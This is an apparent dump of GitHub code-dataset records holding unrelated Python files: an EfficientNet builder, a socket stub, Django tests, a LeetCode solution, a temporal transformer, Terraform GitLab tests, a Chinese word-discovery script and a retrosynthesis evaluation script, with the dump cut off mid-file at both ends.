num_classes (int, optional): # classes.\n\n Returns:\n tf.keras.Model: Model\n \"\"\"\n # Stem\n if params.input_filters > 0:\n name = \"stem\"\n filters = make_divisible(params.input_filters, 8)\n y = conv2d(\n filters,\n kernel_size=params.input_kernel_size,\n strides=params.input_strides,\n name=name,\n )(x)\n y = batch_norm(name=name)(y)\n y = relu6(name=name)(y)\n else:\n y = x\n\n y = efficientnet_core(blocks=params.blocks, drop_connect_rate=params.drop_connect_rate)(y)\n\n if params.output_filters:\n name = \"neck\"\n filters = make_divisible(params.output_filters, 8)\n y = conv2d(filters, kernel_size=(1, 1), strides=(1, 1), padding=\"same\", name=name)(y)\n y = batch_norm(name=name)(y)\n y = relu6(name=name)(y)\n\n if params.include_top:\n name = \"top\"\n y = tf.keras.layers.GlobalAveragePooling2D(name=f\"{name}.pool\")(y)\n if 0 < params.dropout < 1:\n y = tf.keras.layers.Dropout(params.dropout)(y)\n y = tf.keras.layers.Dense(num_classes, name=name)(y)\n model = tf.keras.Model(x, y, name=params.model_name)\n return model\n","repo_name":"AmbiqAI/heartkit","sub_path":"heartkit/models/efficientnet.py","file_name":"efficientnet.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"82"} +{"seq_id":"3797531765","text":"import socket\n\nfrom cred import IP, PORT\n\n\nclass Socket(socket.socket):\n def __init__(self):\n super(Socket, self).__init__(\n socket.AF_INET,\n socket.SOCK_STREAM,\n )\n self.IP = IP\n self.PORT = int(PORT)\n self.CODING = 'utf-8'\n self.PACKAGE_SIZE = 2048\n self.CONNECTED = 'connected'\n self.type_object = None\n self._quit = False\n self.clients = []\n self.status = 'offline'\n self.data = ''\n\n def set_down(self):\n self.status = '[ client stopped ]'\n print(self.status)\n self._quit = True\n self.close()\n exit()\n\n def set_up(self):\n raise NotImplemented()\n","repo_name":"nikitaminiaev/Assembler","sub_path":"stub_microcontroller/mySocket_stub.py","file_name":"mySocket_stub.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"21320834500","text":"from datetime import datetime\nfrom datetime import timedelta\nimport time\nimport json\nimport requests\nimport random\nfrom random import randrange\nimport pytz\n\nimport names # pip install names\nfrom django.test import TestCase\nfrom django.test import LiveServerTestCase\nfrom django.test import Client\nfrom django.shortcuts import get_object_or_404\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.db.models import Q\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate\n\nfrom kmutnbtrackapp.models import History, Person, Lab, User\n# Create your tests here.\n\n\nutc=pytz.UTC\nclass Searching_test(LiveServerTestCase):\n def generate_history(count, person_list, lab_list, start, end):\n def random_datetime(start, end):\n \"\"\"\n This function will return a random datetime between two datetime \n objects.\n \"\"\"\n start = datetime.strptime(start, '%d/%m/%Y %H:%M') # '1/1/2020 9:00'\n end = datetime.strptime(end, '%d/%m/%Y %H:%M') # '1/1/2020 9:00'\n delta = end - start\n int_delta = (delta.days * 24 * 60) + (delta.seconds / 60)\n random_minute = randrange(int_delta)\n return start + timedelta(minutes=random_minute)\n\n class infinite_iterator(): \n def __init__(self,lst):\n self.i = 0\n self.lst = lst\n self.lst_len = len(lst)\n def next(self): \n result = self.lst[self.i % self.lst_len]\n self.i += 1\n return result\n\n person_list = infinite_iterator(person_list)\n\n for i in range(count):\n p = person_list.next()\n checkin_time = random_datetime(start, end)\n checkout_time = checkin_time + timedelta(hours=random.choice([1,2,3]))\n a = History.objects.create( person=p, lab=random.choice(lab_list), checkin=checkin_time, checkout=checkout_time)\n a.checkin=checkin_time\n a.save()\n\n def setUp():\n labA = Lab.objects.create(name=\"computer\", max_number_of_people=10)\n labB = Lab.objects.create(name=\"ece\", max_number_of_people=10)\n labC = Lab.objects.create(name=\"physic\", max_number_of_people=10)\n lablist = [labA, labB, labC]\n \n person_list = [] \n for i in range(25):\n firstname = names.get_first_name() + str(randrange(1000))\n lastname = names.get_last_name()\n u = User.objects.create(username=firstname,email='',password=lastname)\n p = Person.objects.create(user=u, first_name=firstname, last_name=lastname)\n person_list.append(p)\n \n self.generate_history(100, person_list, lablist, \"1/1/2020 9:00\", \"1/1/2020 16:00\")\n self.generate_history(100, person_list, lablist, \"2/1/2020 9:00\", \"2/1/2020 16:00\")\n\n\n def test_can_query_by_name(self):\n pass\n def test_can_query_by_lab_name(self):\n pass\n def test_can_query_by_time_period(self): \n start = datetime.strptime(\"2020-1-1T12:00 +0700\", \"%Y-%m-%dT%H:%M %z\")\n stop = datetime.strptime(\"2020-1-2T12:00 +0700\", \"%Y-%m-%dT%H:%M %z\")\n histories = History.objects.all()\n histories = histories.exclude( Q(checkin__gt=stop) | Q(checkout__lt=start) )\n for h in histories:\n checkin = h.checkin\n checkout = h.checkout\n print(checkin, checkout, start, stop)\n self.assertTrue(\n (checkin >= start and checkin <= stop) # intersect forward\n or (checkout >= start and checkout <= stop) # intersect backward\n or (checkin >= start and checkout <= stop) # intersect inside\n or (checkin <= start and checkout>= stop) \n )\n def test_can_search_people_who_close_to_infected_person(self):\n pass\n","repo_name":"kmutnb-covid19/lab_track","sub_path":"kmutnbtrackapp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"82"} +{"seq_id":"41295308534","text":"class Solution:\n def isRobotBounded(self, instructions: str) -> bool:\n directions = [(0,1), (1, 0), (0, -1), (-1, 0)]\n x = y = 0\n index = 0\n for i in instructions:\n if i == 'L':\n index = (index + 3) % 4\n elif i == \"R\":\n index = (index +1) % 4\n else:\n x += directions[index][0]\n y += directions[index][1]\n return (x == 0 and y ==0) or index !=0","repo_name":"Ishitagangal/LeetCode-Practice","sub_path":"Amazon/Medium/22. Is robot bounded.py","file_name":"22. Is robot bounded.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71034040268","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F_func\nfrom .net import Unit2D\nimport math\nimport numpy as np\nimport time\n\n'''Class that implements the windowed version of temporal transformer.\nFunction adapted from: https://github.com/leaderj1001/Attention-Augmented-Conv2d\n'''\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nmulti_matmul = False\ndropout = False\nscale_norm = False\n\n\nclass tcn_unit_attention_block(nn.Module):\n def __init__(self, in_channels, out_channels, dv_factor, dk_factor, Nh,\n relative, only_temporal_attention, dropout, kernel_size_temporal, stride, weight_matrix,\n last, layer, device, more_channels, drop_connect, n, dim_block1, dim_block2, dim_block3, num_point,\n bn_flag=True,\n shape=25, visualization=False, data_normalization=True, skip_conn=True, more_relative=False):\n super(tcn_unit_attention_block, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.layer = layer\n self.drop_connect = drop_connect\n self.visualization = visualization\n self.more_channels = more_channels\n self.data_normalization = data_normalization\n self.skip_conn = skip_conn\n self.only_temporal_att = only_temporal_attention\n self.kernel_size_temporal = kernel_size_temporal\n self.more_relative = more_relative\n self.kernel_size_attention = 9\n self.num = n\n self.num_point=num_point\n self.dk = int(dk_factor * out_channels)\n if (not self.only_temporal_att):\n self.dv = int(dv_factor * out_channels)\n else:\n self.dv = out_channels\n self.Nh = Nh\n\n self.bn_flag = bn_flag\n self.shape = shape\n self.relative = relative\n self.stride = stride\n if data_normalization:\n self.data_bn = nn.BatchNorm1d(self.in_channels * self.num_point)\n\n self.padding = (self.kernel_size_temporal - 1) // 2\n self.bn = nn.BatchNorm2d(out_channels)\n self.weight_matrix = weight_matrix\n\n if ((self.in_channels != self.out_channels) or (stride != 1)):\n self.down = Unit2D(\n self.in_channels, self.out_channels, kernel_size=1, stride=stride)\n else:\n self.down = None\n self.relu = nn.ReLU(inplace=True)\n self.last = last\n if dropout:\n self.dropout = nn.Dropout(0.25)\n\n assert self.Nh != 0, \"integer division or modulo by zero, Nh >= 1\"\n assert self.dk % self.Nh == 0, \"dk should be divided by Nh. (example: out_channels: 20, dk: 40, Nh: 4)\"\n assert self.dv % self.Nh == 0, \"dv should be divided by Nh. (example: out_channels: 20, dv: 4, Nh: 4)\"\n\n # Temporal convolution\n if (not self.only_temporal_att):\n self.tcn_conv = Unit2D(in_channels, out_channels - self.dv, dropout=dropout,\n kernel_size=kernel_size_temporal,\n stride=self.stride)\n if (self.more_channels):\n\n self.qkv_conv = nn.Conv2d(self.in_channels, (2 * self.dk + self.dv) * self.Nh // self.num,\n kernel_size=(1, stride),\n stride=(1, stride),\n padding=0)\n else:\n self.qkv_conv = nn.Conv2d(self.in_channels, 2 * self.dk + self.dv, kernel_size=(1, stride),\n stride=(1, stride),\n padding=0)\n if (self.more_channels):\n\n self.attn_out = nn.Conv2d(self.dv * self.Nh // self.num, self.dv, kernel_size=1, stride=1)\n else:\n self.attn_out = nn.Conv2d(self.dv, self.dv, kernel_size=1, stride=1)\n\n if self.out_channels == 64:\n self.block_dim = dim_block1\n\n if self.out_channels == 128:\n self.block_dim = dim_block2\n\n if self.out_channels == 256:\n self.block_dim = dim_block3\n\n if self.relative:\n if self.more_channels:\n self.key_rel = nn.Parameter(\n\n torch.randn((2 * self.block_dim - 1, self.dk // self.num), requires_grad=True))\n\n else:\n self.key_rel = nn.Parameter(\n\n torch.randn((2 * self.block_dim - 1, self.dk // Nh), requires_grad=True))\n\n\n def forward(self, x):\n # Input x\n # (batch_size, channels, time, joints)\n N1, C, T1, V = x.size()\n\n x_sum = x\n\n if (self.data_normalization):\n x = x.permute(0, 1, 3, 2).reshape(N1, C * V, T1)\n x = self.data_bn(x)\n x = x.reshape(N1, C, V, T1).permute(0, 1, 3, 2)\n\n x = x.permute(0, 3, 1, 2).reshape(-1, C, 1, T1)\n\n if scale_norm:\n self.scale = ScaleNorm(scale=C ** 0.5)\n x = self.scale(x)\n\n # Temporal Transformer mechanism is applied separately on each block. Then, the results are concatenated.\n\n for i in range(0, T1 // self.block_dim):\n\n block = x[:, :, :, i * self.block_dim: (i * self.block_dim + self.block_dim)]\n N, C, _, T = block.shape\n flat_q, flat_k, flat_v, q, k, v = self.compute_flat_qkv(block, self.dk, self.dv, self.Nh)\n B, self.Nh, C, T = flat_q.size()\n\n # Calculate the scores, obtained by doing q*k\n # (batch_size, Nh, time, dkh)*(batch_size, Nh, dkh, time) = (batch_size, Nh, time, time)\n logits = torch.matmul(flat_q.transpose(2, 3), flat_k)\n\n if self.relative:\n rel_logits = self.relative_logits(q, self.block_dim, i)\n logits_sum = torch.add(logits, rel_logits)\n\n # Calculate weights\n if self.relative:\n\n weights = F_func.softmax(logits_sum, dim=-1)\n\n else:\n weights = F_func.softmax(logits, dim=-1)\n\n if (self.drop_connect and self.training):\n mask = torch.bernoulli((0.5) * torch.ones(B * self.Nh * T, device=device))\n mask = mask.reshape(B, self.Nh, T).unsqueeze(2).expand(B, self.Nh, T, T)\n weights = weights * mask\n weights = weights / (weights.sum(3, keepdim=True) + 1e-8)\n\n # attn_out\n # (batch, Nh, time, dvh)\n # weights*V\n # (batch, Nh, time, time)*(batch, Nh, time, dvh)=(batch, Nh, time, dvh)\n attn_out = torch.matmul(weights, flat_v.transpose(2, 3))\n\n if not self.more_channels:\n attn_out = torch.reshape(attn_out, (B, self.Nh, 1, T, self.dv // self.Nh))\n else:\n attn_out = torch.reshape(attn_out, (B, self.Nh, 1, T, self.dv // self.num))\n\n # All the blocks are concatenated\n if i == 0:\n attn_out_final = attn_out\n else:\n attn_out_final = torch.cat((attn_out_final, attn_out), dim=3)\n\n attn_out = attn_out_final.permute(0, 1, 4, 2, 3)\n\n # combine_heads_2d, combine heads only after having calculated each Z separately\n # (batch, Nh*dv, time, 1)\n attn_out = self.combine_heads_2d(attn_out)\n # Multiply for W0 (batch, out_channels, time, 1) with out_channels=dv\n attn_out = self.attn_out(attn_out)\n attn_out = attn_out.reshape(N1, V, -1, T1 // self.stride).permute(0, 2, 3, 1)\n\n if self.skip_conn:\n if dropout:\n attn_out = self.dropout(attn_out)\n\n if (not self.only_temporal_att):\n x = self.tcn_conv(x_sum)\n result = torch.cat((x, attn_out), dim=1)\n else:\n result = attn_out\n\n result += (x_sum if (self.down is None) else self.down(x_sum))\n\n\n else:\n if (not self.only_temporal_att):\n x = self.tcn_conv(x_sum)\n result = torch.cat((x, attn_out), dim=1)\n else:\n result = attn_out\n\n result += (x_sum if (self.down is None) else self.down(x_sum))\n\n\n else:\n result = attn_out\n\n if (self.bn_flag):\n result = self.bn(result)\n result = self.relu(result)\n return result\n\n def compute_flat_qkv(self, x, dk, dv, Nh):\n qkv = self.qkv_conv(x)\n N, C, H, W = qkv.size()\n if self.more_channels:\n q, k, v = torch.split(qkv, [dk * self.Nh // self.num, dk * self.Nh // self.num, dv * self.Nh // self.num],\n dim=1)\n else:\n q, k, v = torch.split(qkv, [dk, dk, dv], dim=1)\n\n q = self.split_heads_2d(q, Nh)\n k = self.split_heads_2d(k, Nh)\n v = self.split_heads_2d(v, Nh)\n\n dkh = dk // Nh\n q *= dkh ** -0.5\n if self.more_channels:\n flat_q = torch.reshape(q, (N, Nh, dk // self.num, H * W))\n flat_k = torch.reshape(k, (N, Nh, dk // self.num, H * W))\n flat_v = torch.reshape(v, (N, Nh, dv // self.num, H * W))\n else:\n flat_q = torch.reshape(q, (N, Nh, dkh, H * W))\n flat_k = torch.reshape(k, (N, Nh, dkh, H * W))\n flat_v = torch.reshape(v, (N, Nh, dv // self.Nh, H * W))\n return flat_q, flat_k, flat_v, q, k, v\n\n def split_heads_2d(self, x, Nh):\n B, channels, F, V = x.size()\n ret_shape = (B, Nh, channels // Nh, F, V)\n split = torch.reshape(x, ret_shape)\n return split\n\n def combine_heads_2d(self, x):\n batch, Nh, dv, F, V = x.size()\n ret_shape = (batch, Nh * dv, F, V)\n return torch.reshape(x, ret_shape)\n\n def relative_logits(self, q, blocks_dim, i):\n B, Nh, dk, _, T = q.size()\n # B, Nh, V, T, dk -> B, Nh, F, 1, dk\n q = q.permute(0, 1, 3, 4, 2)\n q = q.reshape(B, Nh, T, dk)\n rel_logits = self.relative_logits_1d(q, self.key_rel)\n # rel_logits_h = self.relative_logits_1d(torch.transpose(q, 2, 3), self.key_rel_h, V, T, Nh, \"h\")\n return rel_logits\n\n def relative_logits_1d(self, q, rel_k):\n # compute relative logits along one dimension\n # (B, Nh, 1, V, channels // Nh)*(2 * K - 1, self.dk // Nh)\n # (B, Nh, 1, V, 2 * K - 1)\n # print(\"case\", case)\n # print(\"input relative logits_q \", q.shape)\n # print(\"input relative logits_rel \", rel_k.shape)\n\n rel_logits = torch.einsum('bhld,md->bhlm', q, rel_k)\n\n rel_logits = self.rel_to_abs(rel_logits)\n B, Nh, L, L = rel_logits.size()\n\n return rel_logits\n\n def rel_to_abs(self, x):\n B, Nh, L, _ = x.size()\n col_pad = torch.zeros((B, Nh, L, 1)).to(x)\n x = torch.cat((x, col_pad), dim=3)\n flat_x = torch.reshape(x, (B, Nh, L * 2 * L))\n flat_pad = torch.zeros((B, Nh, L - 1)).to(x)\n flat_x_padded = torch.cat((flat_x, flat_pad), dim=2)\n\n final_x = torch.reshape(flat_x_padded, (B, Nh, L + 1, 2 * L - 1))\n final_x = final_x[:, :, :L, L - 1:]\n return final_x\n\n\nclass ScaleNorm(nn.Module):\n \"\"\"ScaleNorm\"\"\"\n\n def __init__(self, scale, eps=1e-5):\n super(ScaleNorm, self).__init__()\n self.scale = scale\n\n self.eps = eps\n\n def forward(self, x):\n norm = self.scale / torch.norm(x, dim=1, keepdim=True).clamp(min=self.eps)\n return x * norm\n","repo_name":"Chiaraplizz/ST-TR","sub_path":"code/st_gcn/net/temporal_transformer_windowed.py","file_name":"temporal_transformer_windowed.py","file_ext":"py","file_size_in_byte":11436,"program_lang":"python","lang":"en","doc_type":"code","stars":254,"dataset":"github-code","pt":"82"} +{"seq_id":"37192388811","text":"import logging\nimport os\nfrom typing import Callable, Dict, List, Optional\nfrom uuid import UUID\n\nimport pytest\nfrom helpers.utils import deploy_model, is_deployment_with_change\nfrom providers.gitlab.helpers.gitlab_client import GitlabClient\nfrom providers.gitlab.helpers.gitlab_project import GitlabProject\nfrom providers.gitlab.helpers.gitlab_provider import GitlabProvider\nfrom pytest_inmanta.plugin import Project\n\nfrom inmanta.agent.agent import Agent\nfrom inmanta.const import Change, VersionState\nfrom inmanta.protocol.endpoints import Client\nfrom inmanta.server.protocol import Server\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef project_is_deployed(path: str, client: GitlabClient) -> bool:\n return client.get_project(path) is not None\n\n\n@pytest.mark.terraform_provider_gitlab\n@pytest.mark.asyncio\nasync def test_crud(\n project: Project,\n server: Server,\n client: Client,\n environment: str,\n agent_factory: Callable[\n [UUID, Optional[str], Optional[Dict[str, str]], bool, List[str]], Agent\n ],\n provider: GitlabProvider,\n parent_namespace_id: int,\n parent_namespace_path: str,\n gitlab_client: GitlabClient,\n project_name: str,\n cache_agent_dir: str,\n):\n await agent_factory(\n environment=environment,\n hostname=\"node1\",\n agent_map={provider.agent: \"localhost\"},\n code_loader=False,\n agent_names=[provider.agent],\n )\n\n gitlab_project = GitlabProject(\n \"my project\",\n project_name,\n \"my original description\",\n provider,\n parent_namespace_id,\n )\n\n def model(purged: bool = False) -> str:\n m = (\n \"\\nimport terraform\\n\\n\"\n + provider.model_instance(\"provider\")\n + \"\\n\"\n + gitlab_project.model_instance(\"project\", purged)\n )\n LOGGER.debug(m)\n return m\n\n project_path = os.path.join(parent_namespace_path, project_name)\n\n assert not project_is_deployed(project_path, gitlab_client)\n\n # Create\n create_model = model()\n assert (\n await deploy_model(project, create_model, client, environment)\n == VersionState.success\n )\n\n last_action = await gitlab_project.get_last_action(\n client, environment, is_deployment_with_change\n )\n assert last_action.change == Change.created\n\n assert project_is_deployed(project_path, gitlab_client)\n\n # Update\n gitlab_project.description = gitlab_project.description + \" (updated)\"\n update_model = model()\n assert (\n await deploy_model(project, update_model, client, environment)\n == VersionState.success\n )\n\n last_action = await gitlab_project.get_last_action(\n client, environment, is_deployment_with_change\n )\n assert last_action.change == Change.updated\n\n assert project_is_deployed(project_path, gitlab_client)\n\n # Delete\n delete_model = model(purged=True)\n assert (\n await deploy_model(project, delete_model, client, environment)\n == VersionState.success\n )\n\n last_action = await gitlab_project.get_last_action(\n client, environment, is_deployment_with_change\n )\n assert last_action.change == Change.purged\n\n assert not project_is_deployed(project_path, gitlab_client)\n","repo_name":"inmanta/terraform","sub_path":"tests/providers/gitlab/test_gitlab_project.py","file_name":"test_gitlab_project.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"29797073009","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Mar 12 13:25:07 2017\r\n\r\n@author: YoungHao\r\n\"\"\"\r\n\r\nimport math\r\nimport pickle\r\n\r\ncorpus_list = []\r\ncorpus = ''\r\nreverse_corpus = ''\r\nwordDic = {}\r\nreverse_wordDic = {} #反序语料,计算左邻字信息熵\r\nright_word_entropy = {}\r\nleft_word_entropy = {}\r\nprobability_word = {}\r\nconcreation_word = {}\r\nscore = {}\r\n#stop_symbol = '(),.。!,ゅ\\'~~`·?-=:、;[]{}*&^%$#@!~+_=-!@#¥%……&*()——+}{【】||?。><!,;.1234567890:“”\"》《+?/%)(@ \\n \\t \\u3000'\r\n\r\nfor lines in open(\"红楼梦.txt\", encoding = 'utf-8'):\r\n corpus_list.append(lines)\r\n i = i + 1\r\n if(i % 2000 == 0):\r\n print(i)\r\n \r\ncorpus = ''.join(corpus_list) #使用list保存string,然后用join方法来合并,效率比\"+\"更高\r\nreverse_corpus = corpus[::-1]\r\nprint(len(corpus))\r\nprint(len(reverse_corpus))\r\ndef dictionary(w): #w:词语最大长度,建立备选词典\r\n end = int(len(corpus)) #语料长度\r\n for f in range(w):\r\n j = f + 1\r\n i = 0\r\n flag = 0\r\n while( j < end ):\r\n word = str(corpus[i:j])\r\n # for s in stop_symbol:\r\n # if s in word:\r\n # flag = 1\r\n if flag == 0:\r\n if word.strip() not in wordDic:\r\n try:\r\n wordDic[word] = 1\r\n except Exception:\r\n continue\r\n else:\r\n try:\r\n wordDic[word] += 1\r\n except Exception:\r\n continue\r\n i += 1\r\n j += 1\r\n flag = 0\r\n end = int(len(reverse_corpus)) #逆序语料长度\r\n for f in range(w):\r\n j = f + 1\r\n i = 0\r\n flag = 0\r\n while( j < end ):\r\n word = str(reverse_corpus[i:j])\r\n# for s in stop_symbol:\r\n# if s in word:\r\n# flag = 1\r\n if flag == 0:\r\n if word.strip() not in reverse_wordDic:\r\n try:\r\n reverse_wordDic[word] = 1\r\n except Exception:\r\n continue \r\n else:\r\n try:\r\n reverse_wordDic[word] += 1\r\n except Exception:\r\n continue \r\n i += 1\r\n j += 1\r\n flag = 0\r\ndef entropy(): \r\n #先计算右邻字信息熵\r\n sorted_WordDic = sorted(wordDic) #右邻字信息熵\r\n i = 0\r\n length_wordDic = len(sorted_WordDic)\r\n while (i < length_wordDic):\r\n word = sorted_WordDic[i] #目标词语\r\n j = i + 1\r\n if ( j >= length_wordDic):\r\n break\r\n buffer = {} #右邻字及个数 \r\n while (word in sorted_WordDic[j]):\r\n label = sorted_WordDic[j][len(word)]\r\n if label not in buffer:\r\n buffer[label] = wordDic[sorted_WordDic[j]] #不要重复加相关右邻字 \r\n j += 1\r\n if ( j >= length_wordDic):\r\n break\r\n sum = 0.000000001\r\n pro_buffer = {}\r\n for buff in buffer:\r\n sum = sum + buffer[buff]\r\n for buff in buffer:\r\n pro_buffer[buff] = buffer[buff] / sum\r\n right_entropy = 0.0\r\n for pro in pro_buffer:\r\n right_entropy = right_entropy - pro_buffer[pro] * math.log(pro_buffer[pro])\r\n right_word_entropy[word] = right_entropy #保存右邻字信息熵信息\r\n i += 1\r\n \r\n #再计算左邻字信息熵\r\n left_sorted_WordDic = sorted(reverse_wordDic) #左邻字信息熵\r\n i = 0\r\n length_wordDic = len(left_sorted_WordDic) \r\n while (i < length_wordDic):\r\n word = left_sorted_WordDic[i] #目标词语\r\n j = i + 1\r\n if ( j >= length_wordDic):\r\n break\r\n buffer = {} #左邻字个数 \r\n while (word in left_sorted_WordDic[j]):\r\n label = left_sorted_WordDic[j][len(word)]\r\n if label not in buffer:\r\n buffer[label] = reverse_wordDic[left_sorted_WordDic[j]] #不要重复加相关左邻字 \r\n j += 1\r\n if ( j >= length_wordDic):\r\n break\r\n sum = 0.000000001\r\n pro_buffer = {}\r\n for buff in buffer:\r\n sum = sum + buffer[buff]\r\n for buff in buffer:\r\n pro_buffer[buff] = buffer[buff] / sum\r\n left_entropy = 0.0\r\n for pro in pro_buffer:\r\n left_entropy = left_entropy - pro_buffer[pro] * math.log(pro_buffer[pro])\r\n words = word[::-1]\r\n left_word_entropy[words] = left_entropy #保存左邻字信息熵信息 \r\n i += 1\r\ndef concreation(): #计算完整词语凝固程度\r\n sum = 0.0\r\n for i in wordDic:\r\n sum = sum + wordDic[i]\r\n for i in wordDic:\r\n probability_word[i] = wordDic[i] / sum\r\n for i in wordDic:\r\n length = len(i)\r\n if length > 1:\r\n j = 1\r\n p = 9999999999\r\n while (j < length):\r\n right = i[0:j]\r\n left = i[j:length]\r\n k = probability_word[i] / (probability_word[right] * probability_word[left])\r\n if (p > k):\r\n p = k\r\n j += 1\r\n concreation_word[i] = p\r\ndef word_generation(left_entropy, right_entropy, concreation):\r\n for word in wordDic:\r\n if ((len(word)) > 1 and (word in left_word_entropy) and (word in right_word_entropy) and (word in concreation_word)):\r\n if ((left_word_entropy[word] >= left_entropy) and (right_word_entropy[word] >= right_entropy) and (concreation_word[word] >= concreation)):\r\n print(word)\r\n score[word] = concreation_word[word] / left_word_entropy[word] / right_word_entropy[word]\r\n\r\ndictionary(5) #最大长度五个字的词语,参数可调\r\nentropy() #计算左右信息熵\r\nconcreation() #计算内部凝固程度\r\nword_generation(0.2, 0.2, 300) #参数可自行调整\r\n\r\ndef score2pickle():\r\n with open('score_word.pickle', 'wb') as f:\r\n pickle.dump(score, f)\r\n print('sucess')\r\n\r\nscore2pickle()\r\n\r\n\r\n","repo_name":"Chihuataneo/ChineseWordSegment","sub_path":"ChineseWordFound.py","file_name":"ChineseWordFound.py","file_ext":"py","file_size_in_byte":6486,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"33870550766","text":"import os\nimport numpy as np\nimport torch\nimport math\nimport json\nimport argparse\n\nfrom rdkit import Chem\nfrom tqdm import tqdm\nfrom gln.common.cmd_args import cmd_args\nfrom gln.common.consts import DEVICE\nfrom gln.test.model_inference import RetroGLN\n\n\ndef get_dataset(phase):\n file_name = \"%s_dataset.json\" %phase\n products_list = []\n reactants_list = []\n retro_reaction_set = set()\n with open(file_name, 'r') as f:\n dataset = json.load(f)\n for _, reaction_trees in dataset.items():\n max_num_materials = 0\n final_retro_routes_list = None\n for i in range(1, int(reaction_trees['num_reaction_trees'])+1):\n if len(reaction_trees[str(i)]['materials']) > max_num_materials:\n max_num_materials = len(reaction_trees[str(i)]['materials'])\n final_retro_routes_list = reaction_trees[str(i)]['retro_routes']\n\n for retro_route in final_retro_routes_list:\n for retro_reaction in retro_route:\n if retro_reaction not in retro_reaction_set:\n retro_reaction_set.add(retro_reaction)\n products_list.append(retro_reaction.split('>>')[0])\n reactants_list.append(retro_reaction.split('>>')[1])\n\n return products_list, reactants_list\n\n\ndef cano_smiles(smiles):\n try:\n tmp = Chem.MolFromSmiles(smiles)\n if tmp is None:\n return None, smiles\n tmp = Chem.RemoveHs(tmp)\n if tmp is None:\n return None, smiles\n [a.ClearProp('molAtomMapNumber') for a in tmp.GetAtoms()]\n return tmp, Chem.MolToSmiles(tmp)\n except:\n return None, smiles\n\n\ndef get_inference_answer(smiles, beam_size):\n pred_struct = model.run(smiles, 5*beam_size, 5*beam_size, rxn_type='UNK')\n if pred_struct is None:\n return []\n reactants_list = pred_struct['reactants']\n scores_list = pred_struct['scores']\n answer = []\n aim_size = beam_size\n for i in range(len(reactants_list)):\n if aim_size == 0:\n break\n reactants = reactants_list[i].split('.')\n score = scores_list[i]\n num_valid_reactant = 0\n sms = set()\n for r in reactants:\n m = Chem.MolFromSmiles(r)\n if m is not None:\n num_valid_reactant += 1\n sms.add(Chem.MolToSmiles(m))\n if num_valid_reactant != len(reactants):\n continue\n if len(sms):\n try:\n answer.append([sorted(list(sms)), -math.log10(score)])\n except:\n answer.append([sorted(list(sms)), -math.log10(score+1e-10)])\n aim_size -= 1\n\n return answer\n\n\ndef get_prediction_result(task):\n product, ground_truth_reactants = task\n ground_truth_keys = set([Chem.MolToInchiKey(Chem.MolFromSmiles(reactant))[:14] for reactant in ground_truth_reactants.split('.')]) \n for rank, solution in enumerate(get_inference_answer(product, local_args.beam_size)):\n flag = False\n predict_reactants, _ = solution[0], solution[1]\n answer_keys = set([Chem.MolToInchiKey(Chem.MolFromSmiles(reactant))[:14] for reactant in predict_reactants])\n if answer_keys == ground_truth_keys:\n return rank\n if flag: break\n return None\n\n\nif __name__ == \"__main__\":\n cmd_opt = argparse.ArgumentParser(description='Argparser for valid test')\n cmd_opt.add_argument('-epoch_for_test', default=100, type=int, help='model for test')\n cmd_opt.add_argument(\"-beam_size\", help=\"beam size\", type=int, default=10)\n local_args, _ = cmd_opt.parse_known_args()\n\n torch.manual_seed(42)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(42)\n np.random.seed(42)\n\n model_dump = os.path.join(cmd_args.save_dir, 'model-%d.dump' % local_args.epoch_for_test)\n model = RetroGLN(model_dump)\n model.gln.to(DEVICE)\n\n overall_result = np.zeros((local_args.beam_size, 2))\n test_products_list, test_reactants_list = get_dataset('test')\n tasks = []\n for epoch in range(0, len(test_products_list)):\n ground_truth_reactants = test_reactants_list[epoch]\n product = test_products_list[epoch]\n product = Chem.MolToSmiles(Chem.MolFromSmiles(product))\n _, product = cano_smiles(product)\n tasks.append((product, ground_truth_reactants))\n for task in tqdm(tasks):\n rank = get_prediction_result(task)\n overall_result[:, 1] += 1\n if rank is not None:\n overall_result[rank:, 0] += 1\n\n print(\"overall_result: \", overall_result, 100 * overall_result[:, 0] / overall_result[:, 1])\n","repo_name":"SongtaoLiu0823/FusionRetro","sub_path":"GLN/gln/retrosynthesis_test.py","file_name":"retrosynthesis_test.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"82"} +{"seq_id":"33907161670","text":"import cv2\nimport numpy as np\nimport dlib\nimport math\n\ndef correctColours(im1, im2, points):\n \n blurAmount = 0.5 * np.linalg.norm(np.array(points)[38] - np.array(points)[43])\n blurAmount = int(blurAmount)\n\n if blurAmount % 2 == 0:\n blurAmount += 1\n \n im1Blur = cv2.blur(im1, (blurAmount, blurAmount), 0)\n im2Blur = cv2.blur(im2, (blurAmount, blurAmount), 0)\n \n # Avoid divide-by-zero errors.\n im2Blur += (2 * (im2Blur <= 1)).astype(im2Blur.dtype)\n \n ret = np.uint8((im2.astype(np.float32) * im1Blur.astype(np.float32) /\n im2Blur.astype(np.float32)).clip(0,255))\n return ret\n\ndef warpTriangle(img1, img2, tri1, tri2) :\n\n # Find bounding rectangle for each triangle\n r1 = cv2.boundingRect(tri1)\n r2 = cv2.boundingRect(tri2)\n\n # Crop input image\n img1Cropped = img1[r1[1]:r1[1] + r1[3], r1[0]:r1[0] + r1[2]]\n\n # Offset points by left top corner of the respective rectangles\n tri1Cropped = 